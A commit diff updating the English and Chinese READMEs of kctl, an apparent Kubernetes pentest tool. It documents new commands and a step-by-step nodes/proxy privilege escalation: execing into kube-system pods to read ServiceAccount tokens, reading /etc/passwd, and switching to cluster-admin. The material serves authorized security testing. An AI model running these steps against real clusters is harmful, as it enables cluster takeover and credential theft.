docs: update README with new commands and sync EN/CN versions

- Add run, portforward, pid2pod commands documentation
- Add CLI arguments (--api-server, --api-port)
- Add discover output example and typical workflow
- Expand attack scenario with detailed steps
- Sync English and Chinese README content

Co-authored-by: Claude <noreply@anthropic.com>

Author: kinokopio

README.md

@@ -69,20 +69,20 @@
 
 ```bash
 # Linux amd64
-curl -LO https://github.com/kinopio1101/kctl/releases/latest/download/kctl-linux-amd64
+curl -LO https://github.com/kinokopio/kctl/releases/latest/download/kctl-linux-amd64
 chmod +x kctl-linux-amd64
 mv kctl-linux-amd64 /usr/local/bin/kctl
 
 # macOS arm64
-curl -LO https://github.com/kinopio1101/kctl/releases/latest/download/kctl-darwin-arm64
+curl -LO https://github.com/kinokopio/kctl/releases/latest/download/kctl-darwin-arm64
 chmod +x kctl-darwin-arm64
 mv kctl-darwin-arm64 /usr/local/bin/kctl
 ```
 
 ### Build from Source
 
 ```bash
-git clone https://github.com/kinopio1101/kctl.git
+git clone https://github.com/kinokopio/kctl.git
 cd kctl
 go build -o kctl ./main/main.go
 ```
@@ -180,6 +180,24 @@ discover 10.0.0.0/24 -p 10250,10255 -c 200
 discover 10.0.0.0/24 --all
 ```
 
+Output example:
+```
+[*] Scanning 10.0.0.0/24:10250 (254 targets, 100 concurrent)
+[========================================] 100% (254/254)
+[*] Validating Kubelet endpoints...
+
++-------------+-------+------------+
+| IP          | PORT  | HEALTH     |
++-------------+-------+------------+
+| 10.0.0.1    | 10250 | /healthz   |
+| 10.0.0.5    | 10250 | /healthz   |
++-------------+-------+------------+
+
+[+] Scan complete in 3.2s: 3 open ports, 2 Kubelet nodes
+[*] Use 'set target <ip>' to select target
+[*] Use 'show kubelets' to view cached results
+```
+
 ### ServiceAccount Operations
 
 ```bash
@@ -250,15 +268,164 @@ pid2pod --pid 1234
 pid2pod --all
 ```
 
+### Typical Workflow
+
+```bash
+# 1. Scan network to discover Kubelet nodes
+kctl [default]> discover 10.0.0.0/24
+
+# 2. Select target
+kctl [default]> set target 10.0.0.5
+
+# 3. Scan SA permissions on all Pods
+kctl [default]> sa scan
+
+# 4. View high-privilege SAs
+kctl [default]> sa list --admin
+
+# 5. Switch to high-privilege SA
+kctl [default]> sa use kube-system/cluster-admin
+
+# 6. View new identity permissions
+kctl [kube-system/cluster-admin ADMIN]> sa info
+
+# 7. Execute commands with new identity
+kctl [kube-system/cluster-admin ADMIN]> exec -it
+```
+
 ## Attack Scenario
 
 ### nodes/proxy Privilege Escalation
 
-The `nodes/proxy GET` permission is commonly granted to monitoring tools (Prometheus, Datadog, Grafana) but can be exploited for RCE.
+#### Background
+
+The `nodes/proxy GET` permission is commonly granted to monitoring tools (Prometheus, Datadog, Grafana) for collecting metrics.
 
 Based on [Graham Helton's research](https://grahamhelton.com/blog/nodes-proxy-rce), due to Kubelet's authorization flaw with WebSocket connections, `nodes/proxy GET` can be used to execute commands in any Pod.
 
-#### Attack Flow
+#### Vulnerability Mechanism
+
+1. WebSocket protocol requires HTTP GET for initial handshake
+2. Kubelet performs authorization check based on initial HTTP method (GET)
+3. After authorization passes, WebSocket connection can access `/exec` endpoint to execute commands
+4. This bypasses the `nodes/proxy CREATE` permission that should be required
+
+#### Privilege Escalation with kctl
+
+##### Scenario Setup
+
+Assume you have access to a Pod whose ServiceAccount has `nodes/proxy GET` permission:
+
+```yaml
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: nodes-proxy-reader
+rules:
+  - apiGroups: [""]
+    resources: ["nodes/proxy"]
+    verbs: ["get"]
+```
+
+##### Step 1: Enter Console and Check Permissions
+
+```bash
+# Copy kctl to target Pod
+kubectl cp kctl-linux-amd64 attacker:/kctl
+
+# Enter Pod
+kubectl exec -it attacker -- /bin/sh
+
+# Run kctl
+/kctl console
+```
+
+```
+[*] Auto-connecting to Kubelet 10.244.1.1:10250...
+✓ Connected successfully
+[+] Using ServiceAccount: default/attacker
+[*] Checking permissions...
+[+] Risk Level: HIGH
+
+kctl [default/attacker HIGH]>
+```
+
+##### Step 2: View Current Permissions
+
+```
+kctl [default/attacker HIGH]> sa info
+
+  ServiceAccount Information
+  ─────────────────────────────────────────
+  Name            : attacker
+  Namespace       : default
+  Risk Level      : HIGH
+  Token Status    : Valid
+
+  Permissions:
+    - nodes/proxy:get        <- Key permission!
+    - nodes:list
+    - pods:list
+```
+
+##### Step 3: Scan All Pods on the Node
+
+```
+kctl [default/attacker HIGH]> sa scan
+
+[*] Scanning ServiceAccount tokens...
+[*] Found 15 pods with SA tokens
+[*] Checking permissions... (3 concurrent)
+
+RISK     NAMESPACE      POD                    SERVICE ACCOUNT      TOKEN    FLAGS
+─────────────────────────────────────────────────────────────────────────────────
+ADMIN    kube-system    kube-proxy-xxxxx       kube-proxy           Valid    -
+ADMIN    kube-system    coredns-xxxxx          coredns              Valid    -
+HIGH     monitoring     prometheus-xxxxx       prometheus           Valid    -
+...
+
+[+] Scan complete: 15 SAs, 2 ADMIN, 1 CRITICAL, 3 HIGH
+```
+
+##### Step 4: Execute Commands via nodes/proxy
+
+Since we have `nodes/proxy GET` permission, we can execute commands in any Pod via Kubelet API:
+
+```
+kctl [default/attacker HIGH]> pods
+
+NAMESPACE      POD                         STATUS    CONTAINERS
+───────────────────────────────────────────────────────────────
+kube-system    etcd-master                 Running   etcd
+kube-system    kube-apiserver-master       Running   kube-apiserver
+kube-system    kube-proxy-xxxxx            Running   kube-proxy
+default        nginx                       Running   nginx
+...
+```
+
+```
+kctl [default/attacker HIGH]> exec -n kube-system kube-proxy-xxxxx -- cat /var/run/secrets/kubernetes.io/serviceaccount/token
+```
+
+This returns the `kube-proxy` ServiceAccount token, which typically has cluster-admin privileges!
+
+##### Step 5: Switch to High-Privilege Identity
+
+```
+kctl [default/attacker HIGH]> sa use kube-system/kube-proxy
+
+[+] Switched to kube-system/kube-proxy
+[*] Checking permissions...
+[!] Risk Level: ADMIN (cluster-admin)
+
+kctl [kube-system/kube-proxy ADMIN]>
+```
+
+##### Step 6: Full Cluster Control
+
+Now you have cluster-admin privileges and can fully control the cluster with this token.
+
+#### Attack Flow Diagram
 
 ```
 ┌─────────────────────────────────────────────────────────────────┐
@@ -283,32 +450,6 @@ Based on [Graham Helton's research](https://grahamhelton.com/blog/nodes-proxy-rc
 └──────────────┘     └──────────────┘     └──────────────────────┘
 ```
 
-#### Step-by-Step
-
-```bash
-# 1. Copy kctl to target Pod
-kubectl cp kctl-linux-amd64 attacker:/kctl
-
-# 2. Enter Pod and run kctl
-kubectl exec -it attacker -- /bin/sh
-/kctl console
-
-# 3. Scan all SA tokens
-kctl> sa scan
-
-# 4. Find high-privilege SA
-kctl> sa list --admin
-
-# 5. Execute command in system Pod to steal token
-kctl> exec -n kube-system kube-proxy-xxxxx -- cat /var/run/secrets/kubernetes.io/serviceaccount/token
-
-# 6. Switch to high-privilege SA
-kctl> sa use kube-system/kube-proxy
-
-# 7. Now you have cluster-admin!
-kctl [kube-system/kube-proxy ADMIN]>
-```
-
 ## Risk Levels
 
 | Level | Description | Example Permissions |
@@ -349,30 +490,6 @@ kubectl get clusterrolebindings -o json | jq -r '
 done
 ```
 
-## Project Structure
-
-```
-kctl/
-├── cmd/
-│   ├── console/            # Console command entry
-│   └── rootCmd.go
-├── internal/
-│   ├── console/            # Interactive console
-│   │   └── commands/       # Console commands
-│   │       └── sa/         # SA subcommands
-│   ├── session/            # Session state management
-│   ├── client/
-│   │   ├── kubelet/        # Kubelet API client
-│   │   └── k8s/            # K8s API client
-│   ├── db/                 # SQLite in-memory database
-│   └── rbac/               # Permission analysis
-├── pkg/
-│   ├── network/            # Network utilities (scanner)
-│   ├── token/              # JWT token parsing
-│   └── types/              # Type definitions
-└── config/                 # Configuration
-```
-
 ## Disclaimer
 
 - This tool is intended for **authorized security assessments and penetration testing only**

README.zh-CN.md

@@ -54,6 +54,9 @@ kctl 是一个轻量级的 Kubernetes 安全审计工具，专门针对 Kubelet
 # 指定目标进入
 ./kctl console -t 10.0.0.1
 
+# 完整连接参数
+./kctl console -t 10.0.0.1 -p 10250 --token "eyJ..." --api-server 10.0.0.1 --api-port 6443
+
 # 使用代理
 ./kctl console -t 10.0.0.1 --proxy socks5://127.0.0.1:1080
 ```
@@ -103,7 +106,10 @@ kctl [default/attacker CRITICAL]>
 | `sa use <ns/name>` | 切换到指定的 SA |
 | `sa info` | 显示当前 SA 详情 |
 | `pods` | 列出节点上的 Pod |
-| `exec` | 在 Pod 中执行命令 |
+| `exec` | 在 Pod 中执行命令（WebSocket） |
+| `run` | 在 Pod 中执行命令（/run API） |
+| `portforward` | 端口转发到 Pod |
+| `pid2pod` | 将 PID 映射到 Pod（仅 Pod 内） |
 | `set <key> <value>` | 设置配置项 |
 | `show options` | 显示当前配置 |
 | `show status` | 显示会话状态 |
@@ -173,6 +179,60 @@ sa use kube-system/cluster-admin
 sa info
 ```
 
+### exec 命令 - 命令执行
+
+通过 Kubelet API 在 Pod 中执行命令：
+
+```bash
+# 交互式 shell（WebSocket）
+exec -it nginx-pod
+
+# 在指定 Pod 执行命令
+exec nginx-pod -- cat /etc/passwd
+
+# 在所有 Pod 中执行
+exec --all-pods -- whoami
+
+# 排除指定命名空间
+exec --all-pods --filter-ns kube-system -- id
+
+# 使用 /run API（更简单，无需 WebSocket）
+run nginx-pod --cmd "cat /etc/passwd"
+
+# 在所有 Pod 中执行
+run --all-pods --cmd "hostname"
+```
+
+### portforward 命令 - 端口转发
+
+通过 Kubelet API 进行端口转发：
+
+```bash
+# 将本地 8080 端口转发到 Pod 的 80 端口
+portforward nginx-pod 8080:80
+
+# 指定监听地址
+portforward nginx-pod 8080:80 --address 0.0.0.0
+
+# 停止端口转发
+pf stop
+```
+
+### pid2pod 命令 - PID 映射（仅 Pod 内）
+
+将 Linux 进程 ID 映射到 Kubernetes Pod 元数据：
+
+```bash
+# 显示所有容器进程及其 Pod 信息
+pid2pod
+
+# 查看指定 PID
+pid2pod --pid 1234
+
+# 显示所有进程（包括非容器进程）
+pid2pod --all
+```
+
 ### 典型工作流程
 
 ```bash
@@ -381,24 +441,6 @@ kubectl get clusterrolebindings -o json | jq -r '
 done
 ```
 
-## 命令行参数
-
-```
-Usage:
-  kctl console [flags]
-
-Flags:
-  -t, --target string       Kubelet IP 地址
-  -p, --port int            Kubelet 端口 (default 10250)
-      --token string        Token 字符串
-      --token-file string   Token 文件路径
-      --proxy string        SOCKS5 代理地址
-  -h, --help                help for console
-
-Global Flags:
-      --logLevel string     日志等级 (default "info")
-```
-
 ## 风险等级说明
 
 | 等级 | 说明 | 示例权限 |